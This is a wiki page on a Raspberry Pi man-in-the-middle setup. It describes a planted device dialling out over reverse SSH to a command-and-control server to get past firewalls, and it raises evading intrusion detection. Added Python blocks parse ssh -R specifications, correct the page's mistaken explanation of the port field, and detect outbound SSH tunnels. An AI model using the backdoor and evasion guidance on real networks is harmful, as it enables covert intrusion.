From charlesreid1


Revision as of 04:07, 4 August 2015

What It Is

A man-in-the-middle attack is a general concept from cryptography. It involves two parties, Alice and Bob, trying to have an encrypted conversation, which is foiled by an attacker, Eve, who gets in the middle: Alice and Eve communicate with one encryption key, while Bob and Eve communicate with another key.

Wired Network

Trying a man-in-the-middle attack with ARP spoofing on a wired network. The configuration:

+----[Target laptop]
|
|      +---[Raspberry Pi]
|      |
|      |
[Router]

How It Will Work

This (wired) man-in-the-middle attack will work by using the Pi to spoof the MAC address of the target.

Preparing the Pi

First, plug the Pi into the router.

Getting a Reverse Shell to the Pi

How to control the Pi once it is placed on a target network? SSH is an obvious way.

Incoming SSH connections can be, and often will be, blocked by firewalls or other security measures.

Reverse SSH is a good alternative to gain an SSH shell.

Reverse SSH: instead of the command and control server connecting to the Raspberry Pi, the Raspberry Pi initiates the connection to the command and control server. This is the same technique used by many backdoor programs.

SSH Command

The command and control server listens for the Pi. When the Pi comes online, it runs the ssh command and connects out to the remote command and control server.

Normally, when you SSH to a machine, you execute a command like:

$ ssh user@remoteserver

But with the -R flag, ssh additionally sets up a reverse (remote) port forward through that connection back to the listener:

$ ssh  -R  [bind_address:]port:host:hostport  username@remoteserver

Let's ignore bind_address for now.

The port indicates which port on your Raspberry Pi you want to use to get out of the network. Port 22 is the standard SSH port, but this may not be open on the network firewall that your Pi is on. Pick a port you know will be open and use that for port.

host indicates the destination for the tunnel. Once we SSH from the Raspberry Pi into the command and control server, our tunnel is entirely local. So we create a local tunnel from port to hostport. And our host is localhost.

Finally, the username@remoteserver enables us to create an SSH connection to the remote server in the first place.
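As an added example that is not part of the original page, the following Python parses the -R forwarding specification in the ssh(1) grammar quoted above and spells out which end of the tunnel each field refers to. The names parse_remote_forward, RemoteForward and is_valid_forward are my own, not OpenSSH identifiers. One point worth keeping straight when reading the fields, as documented in ssh(1): the first port is opened by sshd on the remote server (bound to its loopback interface unless a bind_address is given and the server's GatewayPorts setting permits it; port 0 lets the server allocate one), and host:hostport is the destination the client side connects to whenever something arrives on that listener. The port that has to pass an egress firewall is the server's own SSH port (22 unless changed with -p). On the server side, the sshd_config options AllowTcpForwarding and GatewayPorts are what decide whether such a listener can be created at all, which is where an administrator auditing reverse forwards should look.

```python
"""Parser for the OpenSSH -R forwarding specification (added example).

Grammar, from ssh(1):   -R [bind_address:]port:host:hostport
  bind_address  optional; address sshd binds the listener to on the server.
                Omitted -> server loopback only; '' or '*' -> all interfaces
                (only honoured if the server's GatewayPorts setting allows it).
  port          TCP port sshd listens on, on the remote server (0 = let the
                server allocate one).
  host:hostport destination the client connects to for each connection
                accepted on that listener.
IPv6 literals are written in square brackets, e.g. [::1]:2222:localhost:22.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class RemoteForward:             # hypothetical name, not an OpenSSH type
    bind_address: Optional[str]  # None -> sshd's default (loopback on the server)
    port: int                    # listener port on the remote server
    host: str                    # forward target, as seen from the client
    hostport: int

    def describe(self, server: str = "remoteserver") -> str:
        """Plain-English reading of the forward, naming each side."""
        if self.bind_address is None:
            where = "loopback interface only"
        elif self.bind_address in ("", "*"):
            where = "all interfaces (requires GatewayPorts on the server)"
        else:
            where = self.bind_address
        return (f"sshd on {server} listens on port {self.port} ({where}); "
                f"each accepted connection is carried back through the SSH "
                f"session and the client connects it to {self.host}:{self.hostport}")


def _split_fields(spec: str) -> List[str]:
    """Split on ':' while keeping bracketed IPv6 literals such as [::1] intact."""
    fields, buf, depth = [], "", 0
    for ch in spec:
        if ch == "[":
            depth += 1
        elif ch == "]":
            depth -= 1
        if ch == ":" and depth == 0:
            fields.append(buf)
            buf = ""
        else:
            buf += ch
    fields.append(buf)
    return fields


def _port(value: str, allow_zero: bool) -> int:
    """Validate a port field; only the server-side listener may be 0."""
    if not value.isdigit():
        raise ValueError(f"port {value!r} is not numeric")
    n = int(value)
    if n > 65535 or (n == 0 and not allow_zero):
        raise ValueError(f"port {n} out of range")
    return n


def parse_remote_forward(spec: str) -> RemoteForward:
    """Parse '[bind_address:]port:host:hostport'; raise ValueError if malformed."""
    fields = _split_fields(spec)
    if len(fields) == 3:
        bind_address, port, host, hostport = None, *fields
    elif len(fields) == 4:
        bind_address, port, host, hostport = fields
        bind_address = bind_address.strip("[]")
    else:
        raise ValueError(f"expected [bind_address:]port:host:hostport, got {spec!r}")
    if not host:
        raise ValueError("host must not be empty")
    return RemoteForward(bind_address, _port(port, allow_zero=True),
                         host.strip("[]"), _port(hostport, allow_zero=False))


def is_valid_forward(spec: str) -> bool:
    """Convenience wrapper: True if the spec parses, False otherwise."""
    try:
        parse_remote_forward(spec)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for example in ("2222:localhost:22", "*:8080:[::1]:80", "[::1]:2222:localhost:22"):
        print(example, "->", parse_remote_forward(example).describe())
```

Running the module prints the reading of three sample specifications; the first of them is the shape used in the section above, and its description makes explicit that the 2222 listener lives on the server, not on the client.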



Circumventing IDS

Intrusion detection systems can identify SSH traffic by how the traffic itself looks (protocol fingerprinting rather than port matching), regardless of which port it uses.
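As an added example of the point above, written from the detection side and not part of the original page, the Python below recognises SSH in flow records without looking at the port: RFC 4253 section 4.2 requires both peers to begin with an identification string of the form "SSH-protoversion-softwareversion [SP comments] CR LF" (the server may send other lines before it), so that banner in the first bytes of either direction gives SSH away on any port. It raises three kinds of alert: an SSH banner on a port other than 22, outbound SSH from an RFC 1918 address to an external one (the direction a reverse tunnel takes), and port 22 traffic with no SSH banner. The Flow record shape, the function names and the sample flows are constructed for this example; 203.0.113.0/24 is a documentation range used as the "external" address.

```python
"""Port-independent SSH detection over constructed flow records (added example).

RFC 4253 section 4.2 requires both peers to begin with an identification
string "SSH-protoversion-softwareversion [SP comments] CR LF"; the server
may send other lines before it.  Matching that banner in the first bytes
of either direction identifies SSH whatever port it runs on.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# "SSH-" protoversion "-" softwareversion [SP comments] CR LF (RFC 4253 4.2).
# Multiline so a server banner preceded by other lines still matches.
_SSH_BANNER = re.compile(rb"^SSH-\d+\.\d+-[\x21-\x7e]+(?: [^\r\n]*)?\r?\n", re.M)

# Addresses treated as "inside": RFC 1918 only.  (ipaddress's is_private also
# covers documentation ranges such as 203.0.113.0/24, so it is not used here.)
_INTERNAL = [ipaddress.ip_network(n)
             for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

REASON_ODD_PORT = "SSH banner on non-standard port"
REASON_OUTBOUND = "outbound SSH from internal host to external server (possible reverse tunnel)"
REASON_NOT_SSH = "port 22 traffic without SSH banner"


@dataclass(frozen=True)
class Flow:                 # constructed record shape, not a real IDS format
    src: str
    dst: str
    dport: int
    client_bytes: bytes     # first payload bytes sent by the initiator
    server_bytes: bytes     # first payload bytes sent by the responder


def is_ssh(flow: Flow) -> bool:
    """True if either direction opens with an RFC 4253 identification string."""
    return bool(_SSH_BANNER.search(flow.client_bytes)
                or _SSH_BANNER.search(flow.server_bytes))


def is_internal(addr: str) -> bool:
    """True for RFC 1918 addresses."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in _INTERNAL)


def analyse(flows: Iterable[Flow]) -> List[Tuple[Flow, str]]:
    """Return (flow, reason) pairs for every flow that merits attention."""
    alerts = []
    for f in flows:
        ssh = is_ssh(f)
        if ssh and f.dport != 22:
            alerts.append((f, f"{REASON_ODD_PORT} {f.dport}"))
        if ssh and is_internal(f.src) and not is_internal(f.dst):
            alerts.append((f, REASON_OUTBOUND))
        if not ssh and f.dport == 22 and (f.client_bytes or f.server_bytes):
            alerts.append((f, REASON_NOT_SSH))
    return alerts


# Constructed sample flows (203.0.113.0/24 is a documentation range).
SAMPLE_FLOWS = [
    # A LAN host dialling out to an external SSH server on 443.
    Flow("192.168.1.50", "203.0.113.10", 443,
         b"SSH-2.0-OpenSSH_7.9\r\n", b"SSH-2.0-OpenSSH_8.4\r\n"),
    # Ordinary admin SSH inside the LAN; server sends a pre-banner line.
    Flow("192.168.1.20", "192.168.1.1", 22,
         b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6\r\n",
         b"Welcome\r\nSSH-2.0-dropbear\r\n"),
    # Plain web traffic on 443: no SSH banner, nothing to flag.
    Flow("192.168.1.20", "192.168.1.1", 443,
         b"GET / HTTP/1.1\r\nHost: router\r\n\r\n", b"HTTP/1.1 200 OK\r\n"),
    # Something other than SSH on port 22.
    Flow("192.168.1.20", "192.168.1.1", 22,
         b"GET / HTTP/1.1\r\n\r\n", b"HTTP/1.1 400 Bad Request\r\n"),
]

if __name__ == "__main__":
    for flow, reason in analyse(SAMPLE_FLOWS):
        print(f"{flow.src} -> {flow.dst}:{flow.dport}: {reason}")
```

On the constructed input the first flow produces two alerts (SSH on 443, and outbound SSH from an internal host) and the last flow one (port 22 without a banner); the two ordinary flows are left alone. Real deployments match the banner at stream start rather than in stored records, but the rule is the same: the port is not the signal, the protocol is.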

Wireless Network